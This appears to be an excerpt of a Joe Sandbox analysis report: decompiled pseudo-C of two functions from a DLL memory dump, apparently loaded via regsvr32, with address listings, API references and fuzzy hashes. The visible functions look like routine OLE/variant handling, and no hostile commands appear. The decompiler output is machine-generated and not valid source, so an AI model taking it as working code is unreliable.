				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = L10001492(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E10048380(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10049170(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E100395F6(_t173, _t176, _t187, _t192, _t195,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = L10001492(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E10047748(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1001D714();
							goto L7;
						}
						E10048380(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x1009ee28;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E10039FF7(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E10039D42(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E10039D98(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1001D714();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1003A5EF))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E10039D98(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1001D714();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E10040466();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E10040466();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E10040466();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E10040466();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(L10001492(_t173, _t185, _t19, _t190, _t201) != 0) {
					E10048380(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E1000A7FB(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}





























                                                                                                                0x1003a2df
                                                                                                                0x1003a2df
                                                                                                                0x1003a2df
                                                                                                                0x1003a2e6
                                                                                                                0x1003a2eb
                                                                                                                0x1003a2f4
                                                                                                                0x1003a2f9
                                                                                                                0x1003a2fc
                                                                                                                0x1003a2ff
                                                                                                                0x1003a303
                                                                                                                0x1003a306
                                                                                                                0x1003a30a
                                                                                                                0x1003a30d
                                                                                                                0x1003a312
                                                                                                                0x1003a312
                                                                                                                0x1003a318
                                                                                                                0x1003a31e
                                                                                                                0x1003a322
                                                                                                                0x1003a327
                                                                                                                0x1003a32e
                                                                                                                0x1003a331
                                                                                                                0x1003a3a5
                                                                                                                0x1003a3a5
                                                                                                                0x1003a3ae
                                                                                                                0x1003a3af
                                                                                                                0x1003a3b4
                                                                                                                0x1003a3b6
                                                                                                                0x1003a3b7
                                                                                                                0x1003a3c8
                                                                                                                0x1003a3cb
                                                                                                                0x1003a3d1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a3d3
                                                                                                                0x1003a3d8
                                                                                                                0x1003a3dd
                                                                                                                0x1003a3e0
                                                                                                                0x1003a3e8
                                                                                                                0x1003a3ed
                                                                                                                0x1003a3fb
                                                                                                                0x1003a3fd
                                                                                                                0x1003a3fd
                                                                                                                0x1003a400
                                                                                                                0x1003a401
                                                                                                                0x1003a406
                                                                                                                0x1003a409
                                                                                                                0x1003a341
                                                                                                                0x1003a341
                                                                                                                0x1003a349
                                                                                                                0x1003a355
                                                                                                                0x1003a5e2
                                                                                                                0x1003a5ea
                                                                                                                0x1003a5ea
                                                                                                                0x1003a34b
                                                                                                                0x1003a34e
                                                                                                                0x1003a350
                                                                                                                0x1003a350
                                                                                                                0x00000000
                                                                                                                0x1003a350
                                                                                                                0x1003a411
                                                                                                                0x1003a416
                                                                                                                0x1003a419
                                                                                                                0x1003a41b
                                                                                                                0x1003a41d
                                                                                                                0x1003a424
                                                                                                                0x1003a427
                                                                                                                0x1003a42a
                                                                                                                0x1003a42d
                                                                                                                0x1003a436
                                                                                                                0x1003a437
                                                                                                                0x1003a43d
                                                                                                                0x1003a440
                                                                                                                0x1003a444
                                                                                                                0x1003a447
                                                                                                                0x1003a44a
                                                                                                                0x1003a44b
                                                                                                                0x1003a44e
                                                                                                                0x1003a44f
                                                                                                                0x1003a454
                                                                                                                0x1003a456
                                                                                                                0x1003a459
                                                                                                                0x1003a4b4
                                                                                                                0x1003a4b4
                                                                                                                0x1003a4b7
                                                                                                                0x1003a4b9
                                                                                                                0x1003a4bc
                                                                                                                0x1003a4d7
                                                                                                                0x1003a4d7
                                                                                                                0x1003a4db
                                                                                                                0x1003a4de
                                                                                                                0x1003a52b
                                                                                                                0x1003a530
                                                                                                                0x1003a533
                                                                                                                0x1003a535
                                                                                                                0x1003a591
                                                                                                                0x1003a591
                                                                                                                0x1003a594
                                                                                                                0x1003a5ba
                                                                                                                0x1003a5c0
                                                                                                                0x1003a5c3
                                                                                                                0x1003a5c7
                                                                                                                0x1003a5cc
                                                                                                                0x1003a5d0
                                                                                                                0x1003a5d4
                                                                                                                0x1003a5d6
                                                                                                                0x1003a5d9
                                                                                                                0x1003a5db
                                                                                                                0x1003a5db
                                                                                                                0x1003a5e0
                                                                                                                0x00000000
                                                                                                                0x1003a5e0
                                                                                                                0x1003a596
                                                                                                                0x1003a596
                                                                                                                0x1003a597
                                                                                                                0x1003a5a1
                                                                                                                0x1003a5a1
                                                                                                                0x1003a5a3
                                                                                                                0x1003a5a8
                                                                                                                0x1003a5a8
                                                                                                                0x00000000
                                                                                                                0x1003a5a3
                                                                                                                0x1003a599
                                                                                                                0x1003a599
                                                                                                                0x1003a59c
                                                                                                                0x1003a5b1
                                                                                                                0x00000000
                                                                                                                0x1003a5b1
                                                                                                                0x1003a59e
                                                                                                                0x1003a59f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a59f
                                                                                                                0x1003a537
                                                                                                                0x1003a53a
                                                                                                                0x1003a540
                                                                                                                0x1003a543
                                                                                                                0x1003a546
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a548
                                                                                                                0x00000000
                                                                                                                0x1003a577
                                                                                                                0x1003a577
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a588
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a565
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a56d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a554
                                                                                                                0x1003a557
                                                                                                                0x1003a55a
                                                                                                                0x1003a55d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a572
                                                                                                                0x1003a575
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a57d
                                                                                                                0x1003a580
                                                                                                                0x1003a582
                                                                                                                0x1003a583
                                                                                                                0x1003a584
                                                                                                                0x1003a585
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a54f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a548
                                                                                                                0x1003a4e0
                                                                                                                0x1003a4e4
                                                                                                                0x1003a4e9
                                                                                                                0x1003a4ed
                                                                                                                0x1003a4f1
                                                                                                                0x1003a4f3
                                                                                                                0x1003a4f6
                                                                                                                0x1003a4f8
                                                                                                                0x1003a4f8
                                                                                                                0x00000000
                                                                                                                0x1003a4fd
                                                                                                                0x1003a4c4
                                                                                                                0x1003a4c7
                                                                                                                0x1003a4cd
                                                                                                                0x1003a4d1
                                                                                                                0x1003a4d2
                                                                                                                0x1003a4d2
                                                                                                                0x00000000
                                                                                                                0x1003a4c4
                                                                                                                0x1003a45b
                                                                                                                0x1003a45f
                                                                                                                0x1003a462
                                                                                                                0x1003a463
                                                                                                                0x1003a464
                                                                                                                0x1003a467
                                                                                                                0x1003a46b
                                                                                                                0x1003a49f
                                                                                                                0x1003a4a4
                                                                                                                0x1003a4aa
                                                                                                                0x1003a4ad
                                                                                                                0x1003a4ad
                                                                                                                0x00000000
                                                                                                                0x1003a4ad
                                                                                                                0x1003a46d
                                                                                                                0x1003a470
                                                                                                                0x1003a495
                                                                                                                0x1003a495
                                                                                                                0x1003a49a
                                                                                                                0x00000000
                                                                                                                0x1003a49a
                                                                                                                0x1003a472
                                                                                                                0x1003a475
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a47a
                                                                                                                0x1003a47d
                                                                                                                0x1003a491
                                                                                                                0x1003a47f
                                                                                                                0x1003a484
                                                                                                                0x1003a487
                                                                                                                0x1003a487
                                                                                                                0x00000000
                                                                                                                0x1003a47d
                                                                                                                0x1003a3b9
                                                                                                                0x1003a3b9
                                                                                                                0x1003a3bd
                                                                                                                0x1003a3c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a3c2
                                                                                                                0x1003a3c5
                                                                                                                0x00000000
                                                                                                                0x1003a3c5
                                                                                                                0x1003a333
                                                                                                                0x1003a333
                                                                                                                0x1003a336
                                                                                                                0x1003a33f
                                                                                                                0x1003a361
                                                                                                                0x1003a366
                                                                                                                0x1003a369
                                                                                                                0x1003a36f
                                                                                                                0x1003a374
                                                                                                                0x1003a379
                                                                                                                0x1003a37d
                                                                                                                0x1003a380
                                                                                                                0x1003a384
                                                                                                                0x1003a387
                                                                                                                0x1003a38b
                                                                                                                0x1003a38b
                                                                                                                0x1003a38c
                                                                                                                0x1003a390
                                                                                                                0x1003a394
                                                                                                                0x1003a395
                                                                                                                0x1003a398
                                                                                                                0x1003a3a0
                                                                                                                0x1003a3a3
                                                                                                                0x1003a3a3
                                                                                                                0x00000000
                                                                                                                0x1003a3a3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 1003A2E6
                                                                                                                • lstrlenA.KERNEL32(00000000,000000FF,00000050,1002AA26,00000000,00000001,?,?,000000FF,?,?,?), ref: 1003A318
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A361
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A3D8
                                                                                                                • _memset.LIBCMT ref: 1003A3E8
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A411
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1003A4C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2586305615-0
                                                                                                                • Opcode ID: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
                                                                                                                • Instruction ID: 8a55a60cb0bb44ec9ac80b342bc5a56f9bc70aa257b53d36690aa41eb9699fb4
                                                                                                                • Opcode Fuzzy Hash: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
                                                                                                                • Instruction Fuzzy Hash: 86A18B31C00649DFCF12DFA4C885AEEBBB0FF46362F204159E915AB291D735AE81DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B0A9 Relevance: 13.7, APIs: 9, Instructions: 232filecomstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1000B0A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				struct HMETAFILE__* _t69;
				void* _t74;
				void* _t82;
				void* _t83;
				struct HMETAFILE__* _t84;
				void* _t85;
				void* _t87;
				void* _t89;
				struct HMETAFILE__* _t90;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t103;
				void* _t104;
				WCHAR* _t105;
				struct HMETAFILE__* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t118;
				void* _t119;
				struct HMETAFILE__* _t121;
				void _t128;
				void* _t147;
				void* _t153;
				void* _t161;

				_push(0x5c);
				E100476B6(0x1008dd90, __ebx, __edi, __esi);
				_t157 =  *(_t161 + 0xc);
				_t153 =  *(_t161 + 0x10);
				if( *_t157 != 0) {
					L10:
					_t68 =  *_t153 - 1;
					if(_t68 == 0) {
						_t69 = E1000A992(_t128,  *(_t157 + 4),  *(_t153 + 4));
						__eflags = _t69;
						if(_t69 == 0) {
							goto L19;
						} else {
							 *(_t157 + 4) = _t69;
							goto L37;
						}
					} else {
						_t74 = _t68 - 1;
						if(_t74 == 0) {
							_push( *(_t157 + 4));
							E1000B053(0, _t161 - 0x60, _t153, _t157, __eflags);
							_push( *(_t157 + 4));
							 *((intOrPtr*)(_t161 - 4)) = 0;
							E1000B053(0, _t161 - 0x5c, _t153, _t157, __eflags);
							asm("sbb esi, esi");
							asm("sbb edi, edi");
							_t157 = CopyFileA(_t153,  ~( *(_t157 + 4)) &  *(_t161 - 0x5c), 0);
							L100013E3( *(_t161 - 0x5c) + 0xfffffff0, _t147);
							L100013E3( *((intOrPtr*)(_t161 - 0x60)) + 0xfffffff0, _t147);
						} else {
							_t82 = _t74;
							if(_t82 == 0) {
								_t83 =  *(_t153 + 4);
								_t84 =  *((intOrPtr*)( *_t83 + 0x30))(_t83, _t161 - 0x58, 1);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L19;
								} else {
									_t85 =  *(_t157 + 4);
									 *((intOrPtr*)(_t161 - 0x64)) = 0;
									 *((intOrPtr*)( *_t85 + 0x14))(_t85, 0, 0, 0, 0);
									_t87 =  *(_t153 + 4);
									 *((intOrPtr*)( *_t87 + 0x14))(_t87, 0, 0, 0, 0);
									_t89 =  *(_t153 + 4);
									_t90 =  *((intOrPtr*)( *_t89 + 0x1c))(_t89,  *(_t157 + 4),  *((intOrPtr*)(_t161 - 0x50)),  *((intOrPtr*)(_t161 - 0x4c)), 0, 0);
									__eflags = _t90;
									if(_t90 != 0) {
										goto L19;
									} else {
										_t91 =  *(_t157 + 4);
										_t157 = 0;
										 *((intOrPtr*)( *_t91 + 0x14))(_t91, 0, 0, 0, 0);
										_t153 =  *(_t153 + 4);
										 *((intOrPtr*)( *_t153 + 0x14))(_t153, 0, 0, 0, 0);
										goto L37;
									}
								}
							} else {
								_t95 = _t82 - 4;
								if(_t95 == 0) {
									_t153 =  *(_t153 + 4);
									 *((intOrPtr*)( *_t153 + 0x1c))(_t153, 0, 0, 0,  *(_t157 + 4));
									asm("sbb eax, eax");
								} else {
									_t100 = _t95 - 8;
									if(_t100 == 0) {
										L16:
										if( *(_t157 + 4) != 0) {
											goto L19;
										} else {
											__imp__OleDuplicateData( *(_t153 + 4),  *((intOrPtr*)(_t161 + 8)), 0);
											 *(_t157 + 4) = _t100;
										}
									} else {
										_t100 = _t100 - 0x30;
										if(_t100 != 0) {
											goto L19;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				} else {
					_t128 =  *_t153;
					_t103 = _t128 - 1;
					if(_t103 == 0) {
						L8:
						 *_t157 = _t128;
						goto L9;
					} else {
						_t104 = _t103 - 1;
						if(_t104 == 0) {
							 *_t157 = 2;
							_t105 =  *(_t153 + 4);
							__eflags = _t105;
							if(__eflags == 0) {
								_t105 = E1000A069(0, _t128, _t153, _t157, __eflags);
							}
							 *((intOrPtr*)(_t161 - 0x60)) = lstrlenW(_t105);
							_t108 = E1000A7A4(_t128, __eflags, _t106 + 1, 2);
							__eflags = _t108;
							 *(_t157 + 4) = _t108;
							if(_t108 == 0) {
								goto L19;
							} else {
								E1000A7FB(_t153, _t157, _t161, _t108,  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2,  *(_t153 + 4),  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2);
								goto L37;
							}
						} else {
							_t111 = _t104;
							if(_t111 == 0) {
								_t153 =  *(_t153 + 4);
								 *(_t157 + 4) = _t153;
								 *((intOrPtr*)( *_t153 + 4))(_t153);
								 *_t157 = 4;
								goto L37;
							} else {
								_t114 = _t111 - 4;
								if(_t114 == 0) {
									_t153 =  *(_t153 + 4);
									 *(_t157 + 4) = _t153;
									 *((intOrPtr*)( *_t153 + 4))(_t153);
									 *_t157 = 8;
									goto L37;
								} else {
									_t117 = _t114 - 8;
									if(_t117 == 0) {
										 *_t157 = 0x10;
										L9:
										 *(_t157 + 4) = 0;
										goto L10;
									} else {
										_t118 = _t117 - 0x10;
										if(_t118 == 0) {
											_t119 = E1000A992(_t128, 0,  *(_t153 + 4));
											__eflags = _t119;
											 *(_t161 - 0x5c) = _t119;
											if(_t119 != 0) {
												_t153 = GlobalLock(_t119);
												_t121 = CopyMetaFileA( *(_t153 + 0xc), 0);
												__eflags = _t121;
												 *(_t153 + 0xc) = _t121;
												if(_t121 != 0) {
													_t153 =  *(_t161 - 0x5c);
													GlobalUnlock(_t153);
													 *(_t157 + 4) = _t153;
													 *_t157 = 0x20;
													L37:
													__eflags = 1;
												} else {
													GlobalUnlock( *(_t161 - 0x5c));
													GlobalFree( *(_t161 - 0x5c));
													goto L19;
												}
											} else {
												goto L19;
											}
										} else {
											if(_t118 == 0x20) {
												goto L8;
											}
										}
									}
								}
							}
						}
					}
				}
				return E10047739(0, _t153, _t157);
			}






























                                                                                                                0x1000b0a9
                                                                                                                0x1000b0b0
                                                                                                                0x1000b0b5
                                                                                                                0x1000b0b8
                                                                                                                0x1000b0bf
                                                                                                                0x1000b0f8
                                                                                                                0x1000b0fa
                                                                                                                0x1000b0fb
                                                                                                                0x1000b30f
                                                                                                                0x1000b314
                                                                                                                0x1000b316
                                                                                                                0x00000000
                                                                                                                0x1000b31c
                                                                                                                0x1000b31c
                                                                                                                0x00000000
                                                                                                                0x1000b31c
                                                                                                                0x1000b101
                                                                                                                0x1000b101
                                                                                                                0x1000b102
                                                                                                                0x1000b2b7
                                                                                                                0x1000b2bd
                                                                                                                0x1000b2c2
                                                                                                                0x1000b2c8
                                                                                                                0x1000b2cb
                                                                                                                0x1000b2d8
                                                                                                                0x1000b2df
                                                                                                                0x1000b2f3
                                                                                                                0x1000b2f5
                                                                                                                0x1000b300
                                                                                                                0x1000b108
                                                                                                                0x1000b109
                                                                                                                0x1000b10a
                                                                                                                0x1000b241
                                                                                                                0x1000b24d
                                                                                                                0x1000b250
                                                                                                                0x1000b252
                                                                                                                0x00000000
                                                                                                                0x1000b258
                                                                                                                0x1000b258
                                                                                                                0x1000b264
                                                                                                                0x1000b267
                                                                                                                0x1000b26a
                                                                                                                0x1000b276
                                                                                                                0x1000b279
                                                                                                                0x1000b28a
                                                                                                                0x1000b28d
                                                                                                                0x1000b28f
                                                                                                                0x00000000
                                                                                                                0x1000b295
                                                                                                                0x1000b295
                                                                                                                0x1000b29f
                                                                                                                0x1000b2a3
                                                                                                                0x1000b2a6
                                                                                                                0x1000b2b2
                                                                                                                0x00000000
                                                                                                                0x1000b2b2
                                                                                                                0x1000b28f
                                                                                                                0x1000b110
                                                                                                                0x1000b110
                                                                                                                0x1000b113
                                                                                                                0x1000b22b
                                                                                                                0x1000b234
                                                                                                                0x1000b239
                                                                                                                0x1000b119
                                                                                                                0x1000b119
                                                                                                                0x1000b11c
                                                                                                                0x1000b123
                                                                                                                0x1000b126
                                                                                                                0x00000000
                                                                                                                0x1000b128
                                                                                                                0x1000b12f
                                                                                                                0x1000b13c
                                                                                                                0x1000b13f
                                                                                                                0x1000b11e
                                                                                                                0x1000b11e
                                                                                                                0x1000b121
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b121
                                                                                                                0x1000b11c
                                                                                                                0x1000b113
                                                                                                                0x1000b10a
                                                                                                                0x1000b102
                                                                                                                0x1000b0c1
                                                                                                                0x1000b0c1
                                                                                                                0x1000b0c5
                                                                                                                0x1000b0c6
                                                                                                                0x1000b0f3
                                                                                                                0x1000b0f3
                                                                                                                0x00000000
                                                                                                                0x1000b0c8
                                                                                                                0x1000b0c8
                                                                                                                0x1000b0c9
                                                                                                                0x1000b1dc
                                                                                                                0x1000b1e2
                                                                                                                0x1000b1e5
                                                                                                                0x1000b1e7
                                                                                                                0x1000b1e9
                                                                                                                0x1000b1e9
                                                                                                                0x1000b1f5
                                                                                                                0x1000b1fc
                                                                                                                0x1000b201
                                                                                                                0x1000b205
                                                                                                                0x1000b208
                                                                                                                0x00000000
                                                                                                                0x1000b20e
                                                                                                                0x1000b21b
                                                                                                                0x00000000
                                                                                                                0x1000b220
                                                                                                                0x1000b0cf
                                                                                                                0x1000b0d0
                                                                                                                0x1000b0d1
                                                                                                                0x1000b1c5
                                                                                                                0x1000b1c8
                                                                                                                0x1000b1ce
                                                                                                                0x1000b1d1
                                                                                                                0x00000000
                                                                                                                0x1000b0d7
                                                                                                                0x1000b0d7
                                                                                                                0x1000b0da
                                                                                                                0x1000b1ae
                                                                                                                0x1000b1b1
                                                                                                                0x1000b1b7
                                                                                                                0x1000b1ba
                                                                                                                0x00000000
                                                                                                                0x1000b0e0
                                                                                                                0x1000b0e0
                                                                                                                0x1000b0e3
                                                                                                                0x1000b1a3
                                                                                                                0x1000b0f5
                                                                                                                0x1000b0f5
                                                                                                                0x00000000
                                                                                                                0x1000b0e9
                                                                                                                0x1000b0e9
                                                                                                                0x1000b0ec
                                                                                                                0x1000b14a
                                                                                                                0x1000b14f
                                                                                                                0x1000b151
                                                                                                                0x1000b154
                                                                                                                0x1000b164
                                                                                                                0x1000b16a
                                                                                                                0x1000b170
                                                                                                                0x1000b172
                                                                                                                0x1000b175
                                                                                                                0x1000b18b
                                                                                                                0x1000b18f
                                                                                                                0x1000b195
                                                                                                                0x1000b198
                                                                                                                0x1000b31f
                                                                                                                0x1000b321
                                                                                                                0x1000b177
                                                                                                                0x1000b17a
                                                                                                                0x1000b183
                                                                                                                0x00000000
                                                                                                                0x1000b183
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b0ee
                                                                                                                0x1000b0f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b0f1
                                                                                                                0x1000b0ec
                                                                                                                0x1000b0e3
                                                                                                                0x1000b0da
                                                                                                                0x1000b0d1
                                                                                                                0x1000b0c9
                                                                                                                0x1000b0c6
                                                                                                                0x1000b327

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B0B0
                                                                                                                • OleDuplicateData.OLE32(?,?,00000000), ref: 1000B12F
                                                                                                                • GlobalLock.KERNEL32 ref: 1000B15E
                                                                                                                • CopyMetaFileA.GDI32(?,00000000), ref: 1000B16A
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000B17A
                                                                                                                • GlobalFree.KERNEL32(?), ref: 1000B183
